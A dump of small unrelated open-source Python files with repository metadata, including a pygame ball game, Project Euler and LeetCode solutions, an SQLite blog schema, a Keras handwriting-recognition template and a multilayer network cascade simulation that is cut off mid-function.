b8d108b3ae4215918a09815113b782fa517301c5 | d5d94067324e2470a1f3ea500270a09f46140911 | /python-3/day10-5.py | 43ec47bea52d29885c03f208ac7024c57771121f | [] | no_license | angrytang/python_book | 1c616305fc64fea130d7f8b4eadb5aab131affe9 | e92088439fa7bdb81888123375999fa5aa5d4a07 | refs/heads/master | 2021-05-18T07:13:02.313549 | 2020-07-13T08:42:58 | 2020-07-13T08:42:58 | 251,174,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,512 | py | from enum import Enum, unique
from math import sqrt
from random import randint
import pygame
@unique
class Color(Enum):
    """Named RGB colours used by the game, plus a random-colour helper."""

    RED = (255, 0, 0)
    GREEN = (0, 255, 0)
    BLUE = (0, 0, 255)
    BLACK = (0, 0, 0)
    WHITE = (255, 255, 255)
    GRAY = (242, 242, 242)

    @staticmethod
    def random_color():
        """Return a random (r, g, b) tuple with each channel in 0..255."""
        return tuple(randint(0, 255) for _ in range(3))
class Ball(object):
    """A coloured circle that bounces inside the window."""

    def __init__(self, x, y, radius, sx, sy, color=Color.RED):
        """Store position (x, y), radius, velocity (sx, sy) and colour."""
        self.x, self.y = x, y
        self.radius = radius
        self.sx, self.sy = sx, sy
        self.color = color
        self.alive = True  # cleared once a bigger ball eats this one

    def move(self, screen):
        """Advance one step, reflecting velocity at the window edges."""
        self.x += self.sx
        self.y += self.sy
        hits_left = self.x - self.radius <= 0
        hits_right = self.x + self.radius >= screen.get_width()
        if hits_left or hits_right:
            self.sx = -self.sx
        hits_top = self.y - self.radius <= 0
        hits_bottom = self.y + self.radius >= screen.get_height()
        if hits_top or hits_bottom:
            self.sy = -self.sy

    def eat(self, other):
        """Absorb *other* when it overlaps this ball and is strictly smaller."""
        if not (self.alive and other.alive) or self == other:
            return
        gap = sqrt((self.x - other.x) ** 2 + (self.y - other.y) ** 2)
        if gap < self.radius + other.radius and self.radius > other.radius:
            other.alive = False
            self.radius = self.radius + int(other.radius * 0.146)

    def draw(self, screen):
        """Render the ball onto *screen*."""
        pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0)
def main():
    """Run the "big ball eats small ball" game loop.

    Left-clicking spawns a ball with random size, speed and colour at
    the cursor; an overlapping, strictly larger ball absorbs smaller
    ones. Loop runs until the window is closed.
    """
    balls = []
    pygame.init()
    screen = pygame.display.set_mode((800, 600))
    pygame.display.set_caption('大球吃小球')
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
                x, y = event.pos
                radius = randint(10,100)
                sx, sy = randint(-10, 10), randint(-10, 10)
                color = Color.random_color()
                ball = Ball(x, y, radius, sx, sy, color)
                balls.append(ball)
        screen.fill((255, 255, 255))
        # Fix: iterate over a copy. The original removed from `balls`
        # while iterating it directly, which skips the element right
        # after each removed ball and leaves dead balls drawn longer.
        for ball in list(balls):
            if ball.alive:
                ball.draw(screen)
            else:
                balls.remove(ball)
        pygame.display.flip()
        pygame.time.delay(50)
        for ball in balls:
            ball.move(screen)
            for other in balls:
                ball.eat(other)
if __name__ == '__main__':
main() | [
"2746813385@qq.com"
] | 2746813385@qq.com |
900aa6cbdac11a4c268e17893b08765df01d5ce5 | 0556f80af60647c0ad229df799a1d9f3c5427cee | /euler12.py | 3064e79a8d119ee747810be415a251935ab66908 | [] | no_license | matsuyu/euler | 3b03bca44066b322bbcbe2c5f65f9276f1ec648b | cd30c4398d8dbf8b46feaa493db51410f5e0ccaa | refs/heads/master | 2021-01-01T03:53:38.779129 | 2016-04-17T10:02:32 | 2016-04-17T10:02:32 | 56,207,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | def factor(n):
total=0
for i in range(1,int(n**0.5)+1):
if n%i==0:
total+=2
return total
# Project Euler 12: find the first triangular number with more than 500
# divisors. `number` accumulates 1 + 2 + ... + i; runs until the
# divisor-count threshold is crossed (slow -- pure trial division).
i=1
number=0
while True:
    number+=i
    i+=1
    if factor(number)>500:
        print(number)
        break
| [
"wang.yuheng@dhs.sg"
] | wang.yuheng@dhs.sg |
e7e368bb72c1d30694469bbb714a9bf0a7a544cb | 74ca902eb52e2f325fbe54927c5c2d41aea3471c | /namba/env/bin/easy_install | 2edb835f96bcf94fd6cfe1498c12e60d6b0a2b0e | [] | no_license | UlanDT/nambafood | 5da003536c1b5729358330f130f34d9f44019eaa | 41ef0422e36567c295eda8e383842c5882306b89 | refs/heads/master | 2023-04-13T14:19:30.710211 | 2021-04-24T10:13:07 | 2021-04-24T10:13:07 | 294,014,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/Ulik/Desktop/namba/namba/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # setuptools console-script shim: strip the "-script.pyw"/".exe"
    # suffix from argv[0], then delegate to easy_install's main().
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"Ulik@Ulanbeks-MacBook-Pro.local"
] | Ulik@Ulanbeks-MacBook-Pro.local | |
1ce69a1233f5a517348185955b4ec1e46eafffd4 | c7aea375046d194a5bd3c9fda615519f4374b790 | /lab3/text_recognizer/networks/line_lstm_ctc.py | 35205b418d4502e5425aa5d9522fd2821741b094 | [] | no_license | venuraja79/fsdl-text-recognizer-project | 195b16bff453df5acda65181e96f65cb98172b54 | 1b9d20f0de2dd5aa59af490b086f985411c60e20 | refs/heads/master | 2020-06-30T22:09:45.433461 | 2019-08-07T08:53:05 | 2019-08-07T08:53:05 | 200,964,049 | 0 | 1 | null | 2019-08-07T03:20:26 | 2019-08-07T03:20:24 | null | UTF-8 | Python | false | false | 2,406 | py | """LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
    """Build a Keras model: sliding-window features -> LSTM -> CTC loss.

    Lab exercise template: the section between the "Your code
    below/above" markers must define `softmax_output` (per-window class
    probabilities); until it is filled in, this function raises
    NameError at the ctc_loss_output line.

    Args:
        input_shape: (image_height, image_width) of the line image.
        output_shape: (output_length, num_classes) of the labels.
        window_width: width in pixels of each extracted patch.
        window_stride: horizontal stride between patches.
    Returns:
        KerasModel wired for CTC training (loss output) and decoding.
    Raises:
        ValueError: if the window geometry yields fewer windows than
            output_length (CTC needs at least one step per label).
    """
    image_height, image_width = input_shape
    output_length, num_classes = output_shape
    # Number of patches the slider produces across the image width.
    num_windows = int((image_width - window_width) / window_stride) + 1
    if num_windows < output_length:
        raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
    image_input = Input(shape=input_shape, name='image')
    y_true = Input(shape=(output_length,), name='y_true')
    input_length = Input(shape=(1,), name='input_length')
    label_length = Input(shape=(1,), name='label_length')
    # Heuristic GPU check: more than 2 visible local devices is taken
    # to mean a CUDA GPU is present -- TODO confirm this assumption.
    gpu_present = len(device_lib.list_local_devices()) > 2
    lstm_fn = CuDNNLSTM if gpu_present else LSTM
    # Your code should use slide_window and extract image patches from image_input.
    # Pass a convolutional model over each image patch to generate a feature vector per window.
    # Pass these features through one or more LSTM layers.
    # Convert the lstm outputs to softmax outputs.
    # Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
    # Your code below (Lab 3)
    # Your code above (Lab 3)
    # Scale the (fractional) input lengths up to window counts so CTC
    # knows how many timesteps each sample actually uses.
    input_length_processed = Lambda(
        lambda x, num_windows=None: x * num_windows,
        arguments={'num_windows': num_windows}
    )(input_length)
    ctc_loss_output = Lambda(
        lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
        name='ctc_loss'
    )([y_true, softmax_output, input_length_processed, label_length])
    ctc_decoded_output = Lambda(
        lambda x: ctc_decode(x[0], x[1], output_length),
        name='ctc_decoded'
    )([softmax_output, input_length_processed])
    model = KerasModel(
        inputs=[image_input, y_true, input_length, label_length],
        outputs=[ctc_loss_output, ctc_decoded_output]
    )
    return model
| [
"sergeykarayev@gmail.com"
] | sergeykarayev@gmail.com |
f49719da2036ba7ff1dc02db5fb0434c2acd830a | f23a0561ed2e1f5192a2933ba3205bbc84e0172c | /ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py | f7d1a4efbee6c85c9b9e2e159797e78386e57bc5 | [] | no_license | TingxieLi/django-restframework | a179a794760830cedcf60c0069cb7c8d4c7127cd | 3645bc3a396727af208db924c6fdee38abc0f894 | refs/heads/master | 2020-12-05T13:13:29.937243 | 2019-07-18T03:33:23 | 2019-07-18T03:33:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only viewset intended to serve monitoring video content."""
    def retrieve(self, request, *args, **kwargs):
        # (translated) Fetch the video content; the video should be
        # streamed in real time -- how should the data be returned here?
        # TODO: unimplemented placeholder.
        pass
| [
"851864721@qq.com"
] | 851864721@qq.com |
0aa90b1e9af9a19c4e57f160a662fd7073394839 | 4393f8f877fe12f5c1ddad07dab36b5e14b5311d | /challenge_01.py | 65ea466563141e447cf266d050d6850f2be56801 | [
"MIT"
] | permissive | jose112624120/python_challenge | 5679c94d45d317e8c63818cd853d27b13ea1b773 | 38ea1ef68a78fe143393c78b61263890c5069f44 | refs/heads/master | 2020-03-07T15:20:32.935198 | 2018-03-31T17:09:44 | 2018-03-31T17:09:44 | 127,552,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | TEXT = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."
URL = "http://www.pythonchallenge.com/pc/def/map.html"
def shiftby2(s):
    """Shift a lowercase letter two places forward, wrapping past 'z'
    ('y' -> 'a', 'z' -> 'b'); any other character is returned as-is.
    """
    if 'a' <= s <= 'z':
        offset = (ord(s) - ord('a') + 2) % 26
        return chr(ord('a') + offset)
    return s
def main():
    """Decode the challenge TEXT and print the URL of the next challenge."""
    print('main')
    # Decode the whole puzzle text character by character.
    mapped = map(shiftby2,TEXT)
    mapped_str = ''.join([x for x in mapped])
    print(mapped_str)
    # The decoded text says to apply the same transform to the URL: "map" -> "ocr".
    mapped = map(shiftby2,"map")
    mapped_str = ''.join([x for x in mapped])
    print(mapped_str)
    print('next challenge:\n',URL.replace('map', mapped_str))
    print('other (more clever) solutions:\n',URL.replace('map', mapped_str).replace('pc','pcc'))
if __name__ == '__main__':
    main()
"jose112624120@gmail.com"
] | jose112624120@gmail.com |
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e | f295b56e9af284092233a724af041a91b35a9f6a | /binary-tree-level-order-traversal/binary-tree-level-order-traversal.py | eb00973a0045f605df9fbf717059748d2f4e83a2 | [] | no_license | saviaga/Coding_E | 7ebdf03b5eca775903ee4b863b56e26190b40029 | dd21bb3b9d8905263416b206877f1a3d9416ee3f | refs/heads/main | 2023-05-02T19:42:07.267054 | 2021-05-21T17:41:52 | 2021-05-21T17:41:52 | 334,220,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if root is None:
return
queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
| [
"saviaga@gmail.com"
] | saviaga@gmail.com |
df51ee1469b90b20b6b1d9cc6a0192fe89b63bac | 40ea5fe2ce75bafa64aa5f5886d6eafc284ccf85 | /fornax/stages/sync/sync.py | 053de457fef6732c4cc2eec57f24001573badbe3 | [
"MIT"
] | permissive | lwencel-priv/fornax | 9a795693fa897210c1af82a00ba647e6ea1682ab | 0f66a6284975bc5a2cfc3d38bc01ef6ad492e40e | refs/heads/master | 2023-01-06T17:48:46.882187 | 2020-11-07T12:19:26 | 2020-11-12T17:39:26 | 297,463,708 | 0 | 0 | MIT | 2020-11-07T12:19:27 | 2020-09-21T21:19:14 | Python | UTF-8 | Python | false | false | 1,353 | py | from argparse import Namespace
from typing import Dict
from shutil import rmtree
from fornax.utils.repository import RepositoryFactory
from fornax.consts import StageType
from ..base_stage import BaseStage
class SyncStage(BaseStage):
    # Pipeline stage that wipes the workspace and (re)creates the source
    # checkout via RepositoryFactory before later stages run.
    def __init__(self, prev_stages_args: Dict[StageType, Namespace], args: Namespace):
        """Initialize sync stage.
        :param args: pipeline args
        :type args: Namespace
        :param prev_stages_args: pipeline args from previous stages
        :type prev_stages_args: Dict[StageType, Namespace]
        """
        super().__init__(prev_stages_args, args)
        # Start from a clean slate: remove any previous workspace contents,
        # then recreate the directory tree the repository sync needs.
        rmtree(args.workspace, ignore_errors=True)
        args.workspace.mkdir(parents=True, exist_ok=True)
        # NOTE(review): _local_manifests_dir / _workspace / _args appear to be
        # set by BaseStage.__init__ -- confirm against the base class.
        self._local_manifests_dir.mkdir(parents=True, exist_ok=True)
        args.repository_storage_path.mkdir(parents=True, exist_ok=True)
        self._repo = RepositoryFactory().create(
            self._args.manifest_type,
            source_path=self._args.source_path,
            source_path_type=self._args.source_path_type,
            branch=self._args.branch,
            repo_storage=self._args.repository_storage_path,
            workspace=self._workspace,
            local_manifests_storage=self._local_manifests_dir,
        )
    def _run(self) -> None:
        """Run sync stage."""
        # Delegate to whichever repository implementation the factory chose.
        self._repo.sync()
| [
"lukasz.wen@outlook.com"
] | lukasz.wen@outlook.com |
4ce02e446ce4895df060625959a73f6d4a1e7ff2 | 1deda52f84b25e52a70dd26afa31c1e40a8391ac | /tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py | e691f1f139291d3f3ce03d32227a38703e6144ae | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlcsilva/syncap | 7ae7b7974b1c3eeb6507006a325725a67c765c7b | c8191de4e77b6ea9109f124b9f398d9f2c7d7662 | refs/heads/master | 2023-04-10T23:16:39.902339 | 2021-04-23T06:03:24 | 2021-04-23T06:03:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
    # Join reference captions (COCO-style annotations) with candidate
    # captions by image id and write them out as {"refs": [...], "cand": [...]}.
    parser = argparse.ArgumentParser()
    parser.add_argument('--refs_file')
    parser.add_argument('--cand_file')
    parser.add_argument('--output_fn')
    args = parser.parse_args()
    # Refs
    j = json.load(open(args.refs_file))
    anns = j['annotations']
    image2anns = defaultdict(list)
    for ann in anns:
        image2anns[ann['image_id']].append(ann['caption'].strip())
    # Cand
    j = json.load(open(args.cand_file))
    image2cand = defaultdict(list)
    for ann in j:
        image2cand[ann['image_id']].append(ann['caption'])
    # Re-key the paired samples by a running index (as strings).
    samples = {}
    for ix, img in enumerate(image2cand):
        d = dict()
        d['refs'] = image2anns[img] #[:5]
        d['cand'] = image2cand[img]
        samples[str(ix)] = d
    with open(args.output_fn, 'w') as f:
        json.dump(samples, f)
| [
"emanuele@di.ku.dk"
] | emanuele@di.ku.dk |
79d14202170a7d08135e126bbb7479e3da932f84 | 09f0505f3ac1dccaf301c1e363423f38768cc3cc | /r_DailyProgrammer/Easy/C266/unittests/unittest.py | 07fde993ddb932a70f2021b847e679aadef121e2 | [] | no_license | Awesome-Austin/PythonPractice | 02212292b92814016d062f0fec1c990ebde21fe7 | 9a717f91d41122be6393f9fcd1a648c5e62314b3 | refs/heads/master | 2023-06-21T11:43:59.366064 | 2021-07-29T23:33:00 | 2021-07-29T23:33:00 | 270,854,302 | 0 | 0 | null | 2020-08-11T20:47:10 | 2020-06-08T23:24:09 | Python | UTF-8 | Python | false | false | 259 | py | #! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
    # Placeholder scaffold: this assertion fails deliberately until a real
    # check for challenge C266 is written.
    def test_something(self):
        self.assertEqual(True, False)
if __name__ == '__main__':
    unittest.main()
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
a16b3a1d3c9f40a23d5d7b127abd1bbd68ff6124 | 7716a18812326afb007ab22d65c92d6c79bb7278 | /Homework_05/main.py | c00f9626bbd9f66de7a1e99c670711d64b7b5f2f | [] | no_license | Peter1509/Homework05 | b7bc6b36f8623e6144242f69ea39aeb6233bd756 | 36054e825734e4368e278331ee4072e7f8648963 | refs/heads/master | 2020-12-27T19:20:43.699272 | 2020-02-03T17:21:53 | 2020-02-03T17:21:53 | 238,020,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,928 | py | from smartninja_sql.sqlite import SQLiteDatabase
# Create the blog schema (users, posts, comments, images) in an SQLite file.
# Each CREATE TABLE is idempotent via IF NOT EXISTS; pretty_print just dumps
# the (initially empty) table contents for inspection.
db = SQLiteDatabase("BlogDB_main.sqlite")
db.execute("""CREATE TABLE IF NOT EXISTS User(
UserId integer primary key autoincrement,
Username text,
Mailadress text UNIQUE,
FirstName text,
LastName text,
Birthday real,
Password text);
""")
db.pretty_print("SELECT * FROM User;")
# Posts link a user to one of the post-content tables below.
db.execute("""CREATE TABLE IF NOT EXISTS Posts(
PostId integer primary key autoincrement,
UserId integer,
PostDefaultId integer,
PostAdminId integer,
CommentId integer,
PostImageId integer);
""")
db.pretty_print("SELECT * FROM Posts;")
db.execute("""CREATE TABLE IF NOT EXISTS Posts_Default(
PostDefaultId integer primary key autoincrement,
PostName text,
PostText text);
""")
db.pretty_print("SELECT * FROM Posts_Default;")
db.execute("""CREATE TABLE IF NOT EXISTS Posts_Admin(
PostAdminId integer primary key autoincrement,
PostName text,
PostText text);
""")
db.pretty_print("SELECT * FROM Posts_Admin;")
db.execute("""CREATE TABLE IF NOT EXISTS Comments(
CommentId integer primary key autoincrement,
CommentText text);
""")
db.pretty_print("SELECT * FROM Comments;")
# Join table between posts and images.
db.execute("""CREATE TABLE IF NOT EXISTS Post_Image(
PostImageId integer primary key autoincrement,
ImageId integer);
""")
db.pretty_print("SELECT * FROM Post_Image;")
db.execute("""CREATE TABLE IF NOT EXISTS Images(
ImageId integer primary key autoincrement,
Imagetyp text);
""")
db.pretty_print("SELECT * FROM Images;")
| [
"noreply@github.com"
] | Peter1509.noreply@github.com |
994ef013a80753d1c06d852b575d1419200b2001 | 631c71f4f4309668dd7a3de9e7eeef944eac2158 | /src/pretix/__init__.py | 9e086b08d5bc3bcda9b85a56c4141cb81d10c768 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | bhaettasch/pretix | 943ee6d8cb48fccd343e2e6fa054c8c4c86f5231 | 5e355b400573783bdd17b1352aefcb36b0efc3f6 | refs/heads/master | 2021-04-18T16:19:48.121409 | 2021-01-05T08:23:00 | 2021-01-05T08:23:00 | 249,561,199 | 0 | 0 | NOASSERTION | 2020-03-23T22:48:21 | 2020-03-23T22:48:20 | null | UTF-8 | Python | false | false | 28 | py | __version__ = "3.15.0.dev0"
| [
"mail@raphaelmichel.de"
] | mail@raphaelmichel.de |
7e177a8d82713addc215fa1037b0a74cbfaafb7d | b9be3d951bfab350191092540edc6e353283d621 | /.direnv/python-3.4.3/bin/rst2xml.py | 94a9206c1126cc30a738a855d3950f2aca899539 | [] | no_license | bekkblando/django-social | 7ebd82f66c82ffa6918621e5ee7142bfa5f712d8 | fe47d1babb94170e5403af9ce0f3c672c3045a0d | refs/heads/master | 2020-12-11T01:40:01.429628 | 2015-08-18T14:24:33 | 2015-08-18T14:24:33 | 38,706,690 | 0 | 0 | null | 2015-07-07T18:25:26 | 2015-07-07T18:25:25 | null | UTF-8 | Python | false | false | 668 | py | #!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
# Set the user's preferred locale so docutils can emit localized output.
# `locale` is stdlib, so the import itself cannot fail; only setlocale can,
# and that failure is non-fatal for this front end.
import locale
try:
    locale.setlocale(locale.LC_ALL, '')
except locale.Error:  # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
    pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
               'reStructuredText sources. ' + default_description)
# Run the command-line publisher with the XML writer.
publish_cmdline(writer_name='xml', description=description)
| [
"bekkblando@gmail.com"
] | bekkblando@gmail.com |
3b92c36c78da0c58ac23cc2b52f5fed11ac2c546 | 04b6cde8f943dccec3dec0aa7399c5eebb4c4ab5 | /codes/Version 6.2/main - Copy.py | ab5376391144ab0a59b7e193c8d3ac4fd6697be8 | [
"MIT"
] | permissive | junohpark221/BSc_individual_project | 708f4ab4088ca7d338a78d51882b019acba017fb | 44f49d3cbb93298880f046551056185b72324d17 | refs/heads/main | 2023-05-18T22:27:49.878182 | 2021-06-02T09:08:25 | 2021-06-02T09:08:25 | 373,092,160 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,936 | py | import networkx as nx
from pymnet import *
import random
import matplotlib
import cascade as cas
import math
import time
matplotlib.use('TkAgg')
# --- Simulation parameters ---
nodes = 300    # nodes per layer
layers = 3     # number of network layers
intra_thres = 0.1    # RGG distance threshold for intra-layer edges
inter_thres = 0.05   # RGG distance threshold for inter-layer/support edges
attack_size = 30     # number of nodes killed by the initial attack
attack_type = "spatial_number" # choose one of the "normal", "spatial_number", "spatial_range"
support_type = "random_layers" # choose one of the "random_nodes", "random_layers"
edge_type = "undirected" # choose one of the "undirected", "directed"
# --- Shared mutable state used by the build/analysis helpers below ---
coords = {}    # node id -> (x, y) position in the unit square
rgg_rgg_supp_nodes = {}    # node -> supporting nodes, intra=RGG / inter=RGG build
rgg_rand_supp_nodes = {}   # intra=RGG / inter=Random build
rand_rgg_supp_nodes = {}   # intra=Random / inter=RGG build (copied from RGG/RGG)
rand_rand_supp_nodes = {}  # intra=Random / inter=Random build (copied from RGG/Random)
intra_rgg_edges = []   # intra-layer RGG edges, cached so Random builds can reuse counts
intra_rand_edges = []  # intra-layer Random edges
inter_rgg_edges = []   # inter-layer RGG edges
inter_rand_edges = []  # inter-layer Random edges
intra_edges_num = []   # per-layer intra-layer edge counts (RGG build)
inter_edges_num = [] # [for_edge, back_edge, for_supp_edge, back_supp_edge]
data_set = []
def cal_dist(cur_node, target_node):
    """Euclidean distance between two nodes, using the global coords map."""
    ax, ay = coords[cur_node]
    bx, by = coords[target_node]
    return math.sqrt((ax - bx) ** 2 + (ay - by) ** 2)
def find_nearest_node(cur_node, supporting_node, neighbours, target_layers):
    """Return the id of the nearest neighbour lying on one of target_layers.

    `neighbours` is an iterable of (node_id, layer) pairs. When no neighbour
    is on an allowed layer, the passed-in `supporting_node` is returned
    unchanged.
    """
    candidates = [
        (nb[0], cal_dist(cur_node, nb[0]))
        for nb in neighbours
        if nb[1] in target_layers
    ]
    if candidates:
        # min() keeps the first minimum, matching the stable sort the
        # original used.
        supporting_node = min(candidates, key=lambda pair: pair[1])[0]
    return supporting_node
def make_interlayer_edges(net, cur_layer, layer_names, intra_type, inter_type):
    """Add edges between layer `cur_layer` and `cur_layer + 1`.

    Behaviour depends on the build variant:
      * RGG/RGG    -- geometric edges within `inter_thres`; also records the
                      per-layer edge counts in `inter_edges_num` so the
                      Random variants can reproduce the same edge budget.
      * RGG/Random -- random edges, but support edges are wired first so the
                      counts match the RGG/RGG build; results cached in
                      `inter_rand_edges`.
      * Random/*   -- replays the cached RGG or Random edge lists.
    """
    if (intra_type == 'RGG') and (inter_type == 'RGG'):
        if cur_layer != (len(layer_names) - 1):
            for_edges = 0
            back_edges = 0
            for_supp_edges = 0
            back_supp_edges = 0
            for cur_node in range((cur_layer * nodes), (cur_layer + 1) * nodes):
                for target_node in range((cur_layer + 1) * nodes, (cur_layer + 2) * nodes):
                    d = cal_dist(cur_node, target_node)
                    if d <= inter_thres:
                        # Edge within range: add it in both directions.
                        net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
                        net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
                        inter_rgg_edges.append((cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
                        inter_rgg_edges.append((target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
                        # Classify each direction as a support edge or a plain edge.
                        if cur_node in rgg_rgg_supp_nodes[target_node]:
                            for_supp_edges += 1
                        else:
                            for_edges += 1
                        if target_node in rgg_rgg_supp_nodes[cur_node]:
                            back_supp_edges += 1
                        else:
                            back_edges += 1
            inter_edges_num.append([for_edges, back_edges, for_supp_edges, back_supp_edges])
    elif (intra_type == 'RGG') and (inter_type == 'Random'):
        if cur_layer != (len(layer_names) - 1):
            for_edges = 0
            back_edges = 0
            for_supp_edges = 0
            back_supp_edges = 0
            cur_nodes = list(range((cur_layer * nodes), (cur_layer + 1) * nodes))
            target_nodes = list(range(((cur_layer + 1) * nodes), ((cur_layer + 2) * nodes)))
            random.shuffle(target_nodes)
            # First wire support edges until the RGG budget is reached.
            for target_node in target_nodes:
                for cur_target in rgg_rand_supp_nodes[target_node]:
                    if cur_target in cur_nodes:
                        net[cur_target, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
                        inter_rand_edges.append((cur_target, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
                        for_supp_edges += 1
                    if for_supp_edges >= inter_edges_num[cur_layer][2]:
                        break
                if for_supp_edges >= inter_edges_num[cur_layer][2]:
                    break
            random.shuffle(cur_nodes)
            for cur_node in cur_nodes:
                for cur_target in rgg_rand_supp_nodes[cur_node]:
                    if cur_target in target_nodes:
                        net[cur_target, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
                        inter_rand_edges.append((cur_target, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
                        back_supp_edges += 1
                    if back_supp_edges >= inter_edges_num[cur_layer][3]:
                        break
                if back_supp_edges >= inter_edges_num[cur_layer][3]:
                    break
            # NOTE(review): sorted() returns a new list; these two calls
            # discard their result, so the lists stay shuffled.
            sorted(cur_nodes)
            sorted(target_nodes)
            # Then add random non-support edges until each directional count
            # matches the RGG build.
            while for_edges < inter_edges_num[cur_layer][0]:
                cur_node = random.choice(cur_nodes)
                target_node = random.choice(target_nodes)
                if net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] == 0:
                    net[cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]] = 1
                    inter_rand_edges.append((cur_node, target_node, layer_names[cur_layer], layer_names[cur_layer + 1]))
                    for_edges += 1
            while back_edges < inter_edges_num[cur_layer][1]:
                cur_node = random.choice(cur_nodes)
                target_node = random.choice(target_nodes)
                if net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] == 0:
                    net[target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]] = 1
                    inter_rand_edges.append((target_node, cur_node, layer_names[cur_layer + 1], layer_names[cur_layer]))
                    back_edges += 1
    elif (intra_type == 'Random') and (inter_type == 'RGG'):
        # Replay the cached RGG inter-layer edges.
        for node_from, node_to, layer_from, layer_to in inter_rgg_edges:
            net[node_from, node_to, layer_from, layer_to] = 1
    elif (intra_type == 'Random') and (inter_type == 'Random'):
        # Replay the cached Random inter-layer edges.
        for node_from, node_to, layer_from, layer_to in inter_rand_edges:
            net[node_from, node_to, layer_from, layer_to] = 1
    return net
def make_intralayer_edges(net, cur_layer, cur_layer_name, intra_type, inter_type):
    """Add edges inside layer `cur_layer`.

    RGG/RGG builds geometric edges and records the count in
    `intra_edges_num`; Random/RGG draws the same number of random edges;
    the other two variants replay the cached edge lists.
    """
    if (intra_type == 'RGG') and (inter_type == 'RGG'):
        edges = 0
        for cur_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
            for target_node in range(cur_layer * nodes, (cur_layer + 1) * nodes):
                if cur_node != target_node:
                    d = cal_dist(cur_node, target_node)
                    if d <= intra_thres:
                        net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
                        intra_rgg_edges.append((cur_node, target_node, cur_layer_name))
                        edges += 1
        intra_edges_num.append(edges)
    elif (intra_type == 'RGG') and (inter_type == 'Random'):
        # NOTE(review): the loop variable shadows the cur_layer_name
        # parameter; it replays ALL cached RGG edges, not only this layer's.
        for cur_node, target_node, cur_layer_name in intra_rgg_edges:
            net[cur_node, target_node, cur_layer_name, cur_layer_name] = 1
    elif (intra_type == 'Random') and (inter_type == 'RGG'):
        cur_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
        target_nodes = list(range((cur_layer * nodes), ((cur_layer + 1) * nodes)))
        edges = 0
        # Draw random pairs until this layer has as many edges as the RGG build.
        while edges < intra_edges_num[cur_layer]:
            cur_node = random.choice(cur_nodes)
            target_node = random.choice(target_nodes)
            if net[cur_node, target_node, cur_layer_name, cur_layer_name] == 0:
